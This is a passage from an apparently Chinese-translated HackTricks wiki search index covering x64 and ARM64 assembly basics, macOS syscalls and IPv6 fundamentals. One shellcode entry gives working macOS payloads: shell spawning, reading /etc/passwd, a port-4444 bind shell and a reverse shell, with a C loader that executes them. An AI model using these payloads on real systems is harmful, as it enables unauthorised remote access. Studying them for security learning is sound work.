Inspecting, debugging and Fuzzing » Introduction to x64 » 
Registers","id":"2089","title":"Registers"},"209":{"body":"","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 基础理论","id":"209","title":"IPv6 基础理论"},"2090":{"body":"x64 的调用约定在不同操作系统之间有所不同。例如: Windows :前 四个参数 通过寄存器 rcx 、 rdx 、 r8 和 r9 传递。进一步的参数被推入堆栈。返回值在 rax 中。 System V(通常用于类 UNIX 系统) :前 六个整数或指针参数 通过寄存器 rdi 、 rsi 、 rdx 、 rcx 、 r8 和 r9 传递。返回值也在 rax 中。 如果函数有超过六个输入, 其余参数将通过堆栈传递 。 RSP ,堆栈指针,必须 16 字节对齐 ,这意味着它指向的地址在任何调用发生之前必须能被 16 整除。这意味着通常我们需要确保在进行函数调用之前,RSP 在我们的 shellcode 中是正确对齐的。然而,在实践中,即使不满足此要求,系统调用通常也能正常工作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Calling Convention","id":"2090","title":"Calling Convention"},"2091":{"body":"Swift 有其自己的 调用约定 ,可以在 https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64 中找到。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Calling Convention in Swift","id":"2091","title":"Calling Convention in Swift"},"2092":{"body":"x64 指令集丰富,保持与早期 x86 指令的兼容性,并引入了新的指令。 mov : 移动 一个值从一个 寄存器 或 内存位置 到另一个。 示例:mov rax, rbx — 将 rbx 中的值移动到 rax。 push 和 pop :将值推入或弹出 堆栈 。 示例:push rax — 将 rax 中的值推入堆栈。 示例:pop rax — 将堆栈顶部的值弹出到 rax。 add 和 sub : 加法 和 减法 操作。 示例:add rax, rcx — 将 rax 和 rcx 中的值相加,并将结果存储在 rax 中。 mul 和 div : 乘法 和 除法 操作。注意:这些在操作数使用方面有特定行为。 call 和 ret :用于 调用 和 从函数返回 。 int :用于触发软件 中断 。例如,int 0x80 用于 32 位 x86 Linux 的系统调用。 cmp : 比较 两个值并根据结果设置 CPU 的标志。 示例:cmp rax, rdx — 比较 rax 和 rdx。 je、jne、jl、jge、... 
: 条件跳转 指令,根据先前的 cmp 或测试结果改变控制流。 示例:在 cmp rax, rdx 指令之后,je label — 如果 rax 等于 rdx,则跳转到 label。 syscall :在某些 x64 系统(如现代 Unix)中用于 系统调用 。 sysenter :在某些平台上的优化 系统调用 指令。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Common Instructions","id":"2092","title":"Common Instructions"},"2093":{"body":"推送旧的基指针 :push rbp(保存调用者的基指针) 将当前堆栈指针移动到基指针 :mov rbp, rsp(为当前函数设置新的基指针) 在堆栈上分配局部变量的空间 :sub rsp, (其中 是所需的字节数)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Function Prologue","id":"2093","title":"Function Prologue"},"2094":{"body":"将当前基指针移动到堆栈指针 :mov rsp, rbp(释放局部变量) 从堆栈中弹出旧的基指针 :pop rbp(恢复调用者的基指针) 返回 :ret(将控制权返回给调用者)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Function Epilogue","id":"2094","title":"Function Epilogue"},"2095":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » macOS","id":"2095","title":"macOS"},"2096":{"body":"有不同类别的系统调用,您可以 在这里找到它们 : c #define SYSCALL_CLASS_NONE\\t0\\t/* Invalid */\\n#define SYSCALL_CLASS_MACH\\t1\\t/* Mach */\\n#define SYSCALL_CLASS_UNIX\\t2\\t/* Unix/BSD */\\n#define SYSCALL_CLASS_MDEP\\t3\\t/* Machine-dependent */\\n#define SYSCALL_CLASS_DIAG\\t4\\t/* Diagnostics */\\n#define SYSCALL_CLASS_IPC\\t5\\t/* Mach IPC */ 然后,您可以在 此网址 中找到每个系统调用号: c 0\\tAUE_NULL\\tALL\\t{ int nosys(void); } { indirect syscall }\\n1\\tAUE_EXIT\\tALL\\t{ void exit(int rval); }\\n2\\tAUE_FORK\\tALL\\t{ int fork(void); }\\n3\\tAUE_NULL\\tALL\\t{ user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }\\n4\\tAUE_NULL\\tALL\\t{ user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }\\n5\\tAUE_OPEN_RWTC\\tALL\\t{ int open(user_addr_t path, int flags, int mode); }\\n6\\tAUE_CLOSE\\tALL\\t{ int close(int fd); }\\n7\\tAUE_WAIT4\\tALL\\t{ 
int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); }\\n8\\tAUE_NULL\\tALL\\t{ int nosys(void); } { old creat }\\n9\\tAUE_LINK\\tALL\\t{ int link(user_addr_t path, user_addr_t link); }\\n10\\tAUE_UNLINK\\tALL\\t{ int unlink(user_addr_t path); }\\n11\\tAUE_NULL\\tALL\\t{ int nosys(void); } { old execv }\\n12\\tAUE_CHDIR\\tALL\\t{ int chdir(user_addr_t path); }\\n[...] 为了从 Unix/BSD 类 调用 open 系统调用 ( 5 ),您需要添加它:0x2000000 因此,调用 open 的系统调用编号将是 0x2000005","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » syscalls","id":"2096","title":"syscalls"},"2097":{"body":"编译: bash nasm -f macho64 shell.asm -o shell.o\\nld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib 提取字节: bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh\\nfor c in $(objdump -d \\"shell.o\\" | grep -E \'[0-9a-f]+:\' | cut -f 1 | cut -d : -f 2) ; do\\necho -n \'\\\\\\\\x\'$c\\ndone # Another option\\notool -t shell.o | grep 00 | cut -f2 -d$\'\\\\t\' | sed \'s/ /\\\\\\\\x/g\' | sed \'s/^/\\\\\\\\x/g\' | sed \'s/\\\\\\\\x$//g\' 测试 shellcode 的 C 代码\\nc // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c\\n// gcc loader.c -o loader\\n#include \\n#include \\n#include \\n#include int (*sc)(); char shellcode[] = \\"\\"; int main(int argc, char **argv) {\\nprintf(\\"[>] Shellcode Length: %zd Bytes\\\\n\\", strlen(shellcode)); void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); if (ptr == MAP_FAILED) {\\nperror(\\"mmap\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mmap\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", ptr); void *dst = memcpy(ptr, shellcode, sizeof(shellcode));\\nprintf(\\"[+] SUCCESS: memcpy\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", dst); int status = mprotect(ptr, 0x1000, 
PROT_EXEC | PROT_READ); if (status == -1) {\\nperror(\\"mprotect\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mprotect\\\\n\\");\\nprintf(\\" |-> Return = %d\\\\n\\", status); printf(\\"[>] Trying to execute shellcode...\\\\n\\"); sc = ptr;\\nsc(); return 0;\\n} Shell 取自 这里 并进行了解释。 with adr\\n使用堆栈 armasm bits 64\\nglobal _main\\n_main:\\ncall r_cmd64\\ndb \'/bin/zsh\', 0\\nr_cmd64: ; the call placed a pointer to db (argv[2])\\npop rdi ; arg1 from the stack placed by the call to l_cmd64\\nxor rdx, rdx ; store null arg3\\npush 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall armasm bits 64\\nglobal _main _main:\\nxor rdx, rdx ; zero our RDX\\npush rdx ; push NULL string terminator\\nmov rbx, \'/bin/zsh\' ; move the path into RBX\\npush rbx ; push the path, to the stack\\nmov rdi, rsp ; store the stack pointer in RDI (arg1)\\npush 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall 使用 cat 读取 目标是执行 execve(\\"/bin/cat\\", [\\"/bin/cat\\", \\"/etc/passwd\\"], NULL),因此第二个参数 (x1) 是一个参数数组(在内存中这意味着一堆地址)。 armasm bits 64\\nsection .text\\nglobal _main _main:\\n; Prepare the arguments for the execve syscall\\nsub rsp, 40 ; Allocate space on the stack similar to `sub sp, sp, #48` lea rdi, [rel cat_path] ; rdi will hold the address of \\"/bin/cat\\"\\nlea rsi, [rel passwd_path] ; rsi will hold the address of \\"/etc/passwd\\" ; Create inside the stack the array of args: [\\"/bin/cat\\", \\"/etc/passwd\\"]\\npush rsi ; Add \\"/etc/passwd\\" to the stack (arg0)\\npush rdi ; Add \\"/bin/cat\\" to the stack (arg1) ; Set in the 2nd argument of exec the addr of the array\\nmov rsi, rsp ; argv=rsp - store RSP\'s value in RSI xor rdx, rdx ; Clear rdx to hold NULL (no environment variables) push 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 
25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall ; Make the syscall section .data\\ncat_path: db \\"/bin/cat\\", 0\\npasswd_path: db \\"/etc/passwd\\", 0 使用 sh 调用命令 armasm bits 64\\nsection .text\\nglobal _main _main:\\n; Prepare the arguments for the execve syscall\\nsub rsp, 32 ; Create space on the stack ; Argument array\\nlea rdi, [rel touch_command]\\npush rdi ; push &\\"touch /tmp/lalala\\"\\nlea rdi, [rel sh_c_option]\\npush rdi ; push &\\"-c\\"\\nlea rdi, [rel sh_path]\\npush rdi ; push &\\"/bin/sh\\" ; execve syscall\\nmov rsi, rsp ; rsi = pointer to argument array\\nxor rdx, rdx ; rdx = NULL (no env variables)\\npush 59 ; put 59 on the stack (execve syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall _exit:\\nxor rdi, rdi ; Exit status code 0\\npush 1 ; put 1 on the stack (exit syscall)\\npop rax ; pop it to RAX\\nbts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)\\nsyscall section .data\\nsh_path: db \\"/bin/sh\\", 0\\nsh_c_option: db \\"-c\\", 0\\ntouch_command: db \\"touch /tmp/lalala\\", 0 Bind shell 来自 https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html 的 Bind shell 在 port 4444 armasm section .text\\nglobal _main\\n_main:\\n; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)\\nxor rdi, rdi\\nmul rdi\\nmov dil, 0x2\\nxor rsi, rsi\\nmov sil, 0x1\\nmov al, 0x2\\nror rax, 0x28\\nmov r8, rax\\nmov al, 0x61\\nsyscall ; struct sockaddr_in {\\n; __uint8_t sin_len;\\n; sa_family_t sin_family;\\n; in_port_t sin_port;\\n; struct in_addr sin_addr;\\n; char sin_zero[8];\\n; };\\nmov rsi, 0xffffffffa3eefdf0\\nneg rsi\\npush rsi\\npush rsp\\npop rsi ; bind(host_sockid, &sockaddr, 16)\\nmov rdi, rax\\nxor dl, 0x10\\nmov rax, r8\\nmov al, 0x68\\nsyscall ; listen(host_sockid, 2)\\nxor rsi, rsi\\nmov sil, 0x2\\nmov rax, r8\\nmov al, 0x6a\\nsyscall ; accept(host_sockid, 0, 0)\\nxor rsi, rsi\\nxor rdx, 
rdx\\nmov rax, r8\\nmov al, 0x1e\\nsyscall mov rdi, rax\\nmov sil, 0x3 dup2:\\n; dup2(client_sockid, 2)\\n; -> dup2(client_sockid, 1)\\n; -> dup2(client_sockid, 0)\\nmov rax, r8\\nmov al, 0x5a\\nsub sil, 1\\nsyscall\\ntest rsi, rsi\\njne dup2 ; execve(\\"//bin/sh\\", 0, 0)\\npush rsi\\nmov rdi, 0x68732f6e69622f2f\\npush rdi\\npush rsp\\npop rdi\\nmov rax, r8\\nmov al, 0x3b\\nsyscall 反向 Shell 来自 https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html 的反向 shell。反向 shell 到 127.0.0.1:4444 armasm section .text\\nglobal _main\\n_main:\\n; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)\\nxor rdi, rdi\\nmul rdi\\nmov dil, 0x2\\nxor rsi, rsi\\nmov sil, 0x1\\nmov al, 0x2\\nror rax, 0x28\\nmov r8, rax\\nmov al, 0x61\\nsyscall ; struct sockaddr_in {\\n; __uint8_t sin_len;\\n; sa_family_t sin_family;\\n; in_port_t sin_port;\\n; struct in_addr sin_addr;\\n; char sin_zero[8];\\n; };\\nmov rsi, 0xfeffff80a3eefdf0\\nneg rsi\\npush rsi\\npush rsp\\npop rsi ; connect(sockid, &sockaddr, 16)\\nmov rdi, rax\\nxor dl, 0x10\\nmov rax, r8\\nmov al, 0x62\\nsyscall xor rsi, rsi\\nmov sil, 0x3 dup2:\\n; dup2(sockid, 2)\\n; -> dup2(sockid, 1)\\n; -> dup2(sockid, 0)\\nmov rax, r8\\nmov al, 0x5a\\nsub sil, 1\\nsyscall\\ntest rsi, rsi\\njne dup2 ; execve(\\"//bin/sh\\", 0, 0)\\npush rsi\\nmov rdi, 0x68732f6e69622f2f\\npush rdi\\npush rsp\\npop rdi\\nxor rdx, rdx\\nmov rax, r8\\nmov al, 0x3b\\nsyscall tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Shellcodes","id":"2097","title":"Shellcodes"},"2098":{"body":"Reading time: 46 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » ARM64v8 简介","id":"2098","title":"ARM64v8 简介"},"2099":{"body":"在 ARMv8 架构中,执行级别,称为 异常级别 (ELs),定义了执行环境的权限等级和能力。共有四个异常级别,从 EL0 到 EL3,每个级别承担不同的职责: EL0 - 用户模式 : 这是权限最低的级别,用于执行常规应用代码。 在 EL0 运行的应用相互以及与系统软件隔离,增强了安全性和稳定性。 EL1 - 操作系统内核模式 : 大多数操作系统内核在此级别运行。 EL1 的权限高于 EL0,可访问系统资源,但为了保证系统完整性存在一些限制。 EL2 - Hypervisor 模式 : 此级别用于虚拟化。运行在 EL2 的 hypervisor 可以在相同物理硬件上管理多个操作系统(每个在其各自的 EL1 中运行)。 EL2 提供对虚拟化环境的隔离和控制功能。 EL3 - Secure Monitor 模式 : 这是权限最高的级别,通常用于安全引导和受信任执行环境。 EL3 可以管理和控制安全态与非安全态之间的访问(例如 secure boot、trusted OS 等)。 这些级别的使用提供了一种结构化且安全的方式来管理系统的不同方面,从用户应用到最高权限的系统软件。ARMv8 对权限级别的设计有助于有效隔离不同系统组件,从而增强系统的安全性和健壮性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 异常级别 - EL (ARM64v8)","id":"2099","title":"异常级别 - EL (ARM64v8)"},"21":{"body":"caution 本书《HackTricks》仅用于教育和信息目的。书中的内容是按“现状”提供的,作者和出版商不对书中包含的信息、产品、服务或相关图形的完整性、准确性、可靠性、适用性或可用性作出任何明示或暗示的陈述或保证。你对这些信息的任何依赖均由你自行承担风险。 作者和出版商在任何情况下均不对因使用本书而导致的任何损失或损害承担责任,包括但不限于间接或后果性损失或损害,或因数据或利润损失而产生的任何损失或损害。 此外,本书中描述的技术和技巧仅供教育和信息目的,不应用于任何非法或恶意活动。作者和出版商不支持或纵容任何非法或不道德的活动,使用本书中包含的信息的风险和判断完全由用户自行承担。 用户对基于本书中包含的信息采取的任何行动负全部责任,并应在尝试实施本书中描述的任何技术或技巧时始终寻求专业建议和帮助。 使用本书即表示用户同意解除作者和出版商对因使用本书或其中任何信息而可能导致的任何损害、损失或伤害的责任和责任。 tip 学习和实践 AWS 黑客技术: 
HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"HackTricks Values & FAQ » 免责声明","id":"21","title":"免责声明"},"210":{"body":"IPv6 地址的结构旨在增强网络组织和设备交互。IPv6 地址分为: 网络前缀 :前 48 位,确定网络段。 子网 ID :接下来的 16 位,用于定义网络内的特定子网。 接口标识符 :最后 64 位,唯一标识子网内的设备。 虽然 IPv6 省略了 IPv4 中的 ARP 协议,但引入了 ICMPv6 ,其主要消息有两个: 邻居请求 (NS) :用于地址解析的组播消息。 邻居通告 (NA) :对 NS 的单播响应或自发公告。 IPv6 还包含特殊地址类型: 回环地址 (::1) :相当于 IPv4 的 127.0.0.1,用于主机内部通信。 链路本地地址 (FE80::/10) :用于本地网络活动,不用于互联网路由。处于同一本地网络的设备可以使用此范围相互发现。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 网络","id":"210","title":"网络"},"2100":{"body":"ARM64 有 31 个通用寄存器 ,标记为 x0 到 x30。每个寄存器可以存储 64-bit (8 字节)值。对于仅需 32 位值的操作,可以使用 w0 到 w30 访问同一寄存器的 32 位模式。 x0 到 x7 - 通常用作临时寄存器和用于向子例程传递参数。 x0 也承载函数的返回数据。 x8 - 在 Linux 内核中,x8 用作 svc 指令的系统调用号。 在 macOS 中实际使用的是 x16! 
x9 到 x15 - 更多的临时寄存器,通常用于局部变量。 x16 和 x17 - 过程内调用寄存器(Intra-procedural Call Registers) 。用于存放立即数的临时寄存器。它们也用于间接函数调用和 PLT(Procedure Linkage Table)存根。 x16 在 macOS 中被用作 svc 指令的 系统调用号 。 x18 - 平台寄存器 。它可以用作通用寄存器,但在某些平台上,该寄存器保留给平台特定用途:在 Windows 中指向当前线程环境块,在 Linux kernel 中指向当前正在执行的 task structure。 x19 到 x28 - 这些是被调用者保存的寄存器(callee-saved)。函数必须为其调用者保留这些寄存器的值,因此在函数开始时将它们存到栈中,并在返回前恢复。 x29 - 帧指针 ,用于跟踪栈帧。当因为函数调用创建新栈帧时,x29 寄存器会被 存入栈中 ,新的帧指针地址(即 sp 地址)会存入该寄存器。 此寄存器也可用作 通用寄存器 ,尽管通常用作访问 局部变量 的引用。 x30 或 lr - 链接寄存器 。当执行 BL(Branch with Link)或 BLR(Branch with Link to Register)指令时,它保存 返回地址 ,即将 pc 的值存入该寄存器。 它也可以像其他寄存器一样使用。 如果当前函数要调用新函数从而覆盖 lr,它会在开始时将 lr 存到栈中,这就是 prologue(序言:stp x29, x30, [sp, #-48]!; mov x29, sp -> 存储 fp 和 lr,分配空间并获取新的 fp),并在结束时恢复,这就是 epilogue(尾声:ldp x29, x30, [sp], #48; ret -> 恢复 fp 和 lr 并返回)。 sp - 栈指针 ,用于跟踪栈顶。 sp 的值应始终保持至少一个 quadword 对齐 ,否则可能触发对齐异常。 pc - 程序计数器(Program counter) ,指向下一条指令。该寄存器只能通过异常产生、异常返回和分支来更新。唯一可以读取该寄存器的普通指令是带链接的分支指令(BL、BLR),它们将 pc 地址存入 lr(Link Register)。 xzr - 零寄存器(Zero register) 。在 32 位形式中也称为 wzr 。可用于轻松获取零值(常见操作)或使用 subs 执行比较,例如 subs XZR, Xn, #10,将结果存储到无处(即在 xzr 中)。 Wn 寄存器是 Xn 寄存器的 32-bit 版本。 tip 从 X0 到 X18 的寄存器是易失的(volatile),这意味着它们的值可能会被函数调用和中断更改。然而,从 X19 到 X28 的寄存器是非易失的(non-volatile),这意味着它们的值必须在函数调用之间被保留(“callee saved”)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 寄存器 (ARM64v8)","id":"2100","title":"寄存器 (ARM64v8)"},"2101":{"body":"此外,还有另外 32 个 128-bit 长度的寄存器 ,可用于优化的单指令多数据(SIMD)操作和浮点运算。这些被称为 Vn 寄存器,虽然它们也可以以 64-bit、32-bit、16-bit 和 8-bit 大小操作,此时分别称为 Qn、Dn、Sn、Hn 和 Bn 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » SIMD 和 浮点寄存器","id":"2101","title":"SIMD 和 浮点寄存器"},"2102":{"body":"有数百个系统寄存器 ,也称为特殊用途寄存器(SPRs),用于 监控 和 控制 处理器行为。 它们只能使用专用的特殊指令 mrs 和 msr 读取或设置。 特殊寄存器 TPIDR_EL0 和 TPIDRRO_EL0 在逆向工程中经常出现。后缀 EL0 表示该寄存器可被访问的 最低异常级别 (在本例中 EL0 是常规程序运行的特权级别)。 它们通常用于存储线程本地存储(thread-local storage)区的基地址。通常第一个对在 EL0 
运行的程序是可读写的,但第二个可以从 EL0 读取并从 EL1 写入(例如内核)。 mrs x0, TPIDR_EL0 ; Read TPIDR_EL0 into x0 msr TPIDR_EL0, X0 ; Write x0 into TPIDR_EL0","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 系统寄存器","id":"2102","title":"系统寄存器"},"2103":{"body":"PSTATE 包含若干进程组件,这些组件被序列化到操作系统可见的 SPSR_ELx 特殊寄存器中,X 表示触发异常的 权限级别 (这允许在异常结束时恢复进程状态)。 以下是可访问的字段: 条件标志 N、Z、C、V : N 表示操作产生了负结果 Z 表示操作产生了零 C 表示发生了进位(carry) V 表示发生了带符号溢出(signed overflow): 两个正数相加得到负结果。 两个负数相加得到正结果。 在减法中,当从较小的正数中减去较大的负数(或反之),且结果无法在给定位宽表示时发生。 显然处理器并不知道操作是有符号还是无符号的,因此在操作中会检查 C 和 V,并在发生进位时指示出来,无论操作是否有符号。 warning 并非所有指令都会更新这些标志。有些指令如 CMP 或 TST 会更新,其他带有 s 后缀的指令如 ADDS 也会更新它们。 当前 寄存器宽度(nRW)标志 :如果该标志为 0,则程序在恢复时将在 AArch64 执行状态下运行。 当前 异常级别(EL) :在 EL0 运行的常规程序其值为 0。 单步执行(SS) 标志:调试器通过在 SPSR_ELx 内设置 SS 标志为 1 来实现单步。程序将执行一步并触发单步异常。 非法异常状态(IL) 标志:当特权软件执行无效的异常级别转换时使用,该标志被设置为 1 并且处理器触发非法状态异常。 DAIF 标志:这些标志允许特权程序选择性屏蔽某些外部异常。 如果 A 为 1 表示将触发 asynchronous aborts 。I 配置用于响应外部硬件中断请求(IRQs),F 与快速中断请求(FIRs)有关。 栈指针选择(SPS) 标志:在 EL1 及以上运行的特权程序可以在使用它们自己的栈指针寄存器和用户模式的栈指针之间切换(例如在 SP_EL1 和 EL0 之间)。这种切换通过写入 SPSel 特殊寄存器来执行。EL0 无法执行此操作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » PSTATE","id":"2103","title":"PSTATE"},"2104":{"body":"ARM64 的调用约定规定前 八个参数 使用寄存器 x0 到 x7 传递。 额外 的参数通过 栈 传递。返回值通过寄存器 x0 返回,如果返回值是 128 位长,也可以通过 x1 返回。x19 到 x30 和 sp 在函数调用间必须被 保留 。 在阅读汇编函数时,注意函数的 prologue (序言)和 epilogue (尾声)。 prologue 通常包括 保存帧指针(x29) 、 设置新的帧指针 ,以及 分配栈空间 。 epilogue 通常包括 恢复已保存的帧指针 并 从函数返回 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 调用约定 (ARM64v8)","id":"2104","title":"调用约定 (ARM64v8)"},"2105":{"body":"Swift 有其自己的 调用约定 ,可以在此找到: https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 
Swift 中的调用约定","id":"2105","title":"Swift 中的调用约定"},"2106":{"body":"ARM64 指令通常具有 格式 opcode dst, src1, src2 ,其中 opcode 是要执行的操作(如 add、sub、mov 等), dst 是存放结果的目标寄存器, src1 和 src2 是源寄存器。也可以使用立即数作为源操作数。 mov :将一个值从一个 寄存器 移动到另一个寄存器。 示例:mov x0, x1 — 将 x1 的值移到 x0。 ldr :将内存中的值 加载 到寄存器。 示例:ldr x0, [x1] — 从 x1 指向的内存位置加载一个值到 x0。 偏移模式(Offset mode) :偏移量影响源指针,例如: ldr x2, [x1, #8],这会从 x1 + 8 地址加载到 x2 ldr x2, [x0, x1, lsl #2],这会从数组 x0 的位置 x1(索引)*4 处加载一个对象到 x2 预索引模式(Pre-indexed mode) :这会对源地址进行计算,获取结果并同时更新源寄存器为新值。 ldr x2, [x1, #8]!,这会把 x1 + 8 加载到 x2 并将 x1 更新为 x1 + 8 str lr, [sp, #-4]!,将链接寄存器存入 sp 并更新寄存器 sp 后索引模式(Post-index mode) :类似于前一种,但先访问内存地址,然后计算并存储偏移。 ldr x0, [x1], #8,将 x1 的内容加载到 x0,然后将 x1 更新为 x1 + 8 PC 相对寻址 :在这种情况下,要加载的地址是相对于 PC 寄存器计算的 ldr x1, =_start,这会将与当前 PC 相关的 _start 符号的地址加载到 x1。 str :将寄存器的值 存储 到内存。 示例:str x0, [x1] — 将 x0 的值存储到 x1 指向的内存位置。 ldp : 加载成对寄存器(Load Pair) 。该指令从连续内存位置 加载两个寄存器 。内存地址通常由另一个寄存器的值加上偏移形成。 示例:ldp x0, x1, [x2] — 从 x2 和 x2 + 8 的内存位置分别加载 x0 和 x1。 stp : 存储成对寄存器(Store Pair) 。该指令将两个寄存器存到连续的内存位置。内存地址通常由另一个寄存器的值加上偏移形成。 示例:stp x0, x1, [sp] — 将 x0 和 x1 存到 sp 和 sp + 8 的内存位置。 stp x0, x1, [sp, #16]! 
— 将 x0 和 x1 存到 sp+16 和 sp + 24 的内存位置,并将 sp 更新为 sp+16。 add :将两个寄存器的值相加并将结果存入寄存器。 语法: add(s) Xn1, Xn2, Xn3 | #imm, [shift #N | RRX] Xn1 -> 目标 Xn2 -> 操作数 1 Xn3 | #imm -> 操作数 2(寄存器或立即数) [shift #N | RRX] -> 执行移位或调用 RRX 示例:add x0, x1, x2 — 将 x1 和 x2 的值相加并存入 x0。 add x5, x5, #1, lsl #12 — 等同于加上 4096(将 1 左移 12 位)-> 1 0000 0000 0000 adds :执行 add 并更新标志 sub :将两个寄存器的值相减并将结果存入寄存器。 参见 add 语法。 示例:sub x0, x1, x2 — 将 x2 从 x1 中减去并将结果存入 x0。 subs :类似于 sub,但会更新标志。 mul :将两个寄存器的值相乘并将结果存入寄存器。 示例:mul x0, x1, x2 — 将 x1 和 x2 的值相乘并存入 x0。 udiv / sdiv :将一个寄存器的值除以另一个并将结果存入寄存器(AArch64 没有名为 div 的指令,无符号除法用 udiv,有符号除法用 sdiv;除以零不会产生异常,结果为 0)。 示例:udiv x0, x1, x2 — 将 x1 除以 x2 并将结果存入 x0。 lsl、lsr、asr、ror、rrx : 逻辑左移(Logical shift left) :从末尾加入 0,将其他位向前移动(相当于乘以 2 的若干次方) 逻辑右移(Logical shift right) :从前端加入 0,将其他位向后移动(无符号情况下相当于除以 2 的若干次方) 算术右移(Arithmetic shift right) :类似 lsr,但如果最高有效位为 1,则补入 1(有符号情况下相当于除以 2 的若干次方) 循环右移(Rotate right) :类似 lsr,但被移出的位会被附加到左端 带扩展的循环右移(Rotate Right with Extend) :类似 ror,但使用 carry 标志作为“最高有效位”。因此 carry 标志移到位 31,被移出的位进入 carry 标志。 bfm : Bit Field Move ,这些操作将值的位 0...n 拷贝并放置到位置 m..m+n。#s 指定左边界位位置,#r 指定右旋量。 Bitfield move: BFM Xd, Xn, #r, #s Signed Bitfield move: SBFM Xd, Xn, #r, #s Unsigned Bitfield move: UBFM Xd, Xn, #r, #s Bitfield 提取与插入 :从一个寄存器复制位域并拷贝到另一个寄存器。 BFI X1, X2, #3, #4 将 X2 的低 4 位插入到 X1 中从第 3 位开始的位置(X1 的其余位保持不变) BFXIL X1, X2, #3, #4 从 X2 的第 3 位提取 4 位并复制到 X1 SBFIZ X1, X2, #3, #4 对 X2 的 4 位进行符号扩展并从位 3 开始插入到 X1,同时将右侧位清零 SBFX X1, X2, #3, #4 从 X2 的第 3 位开始提取 4 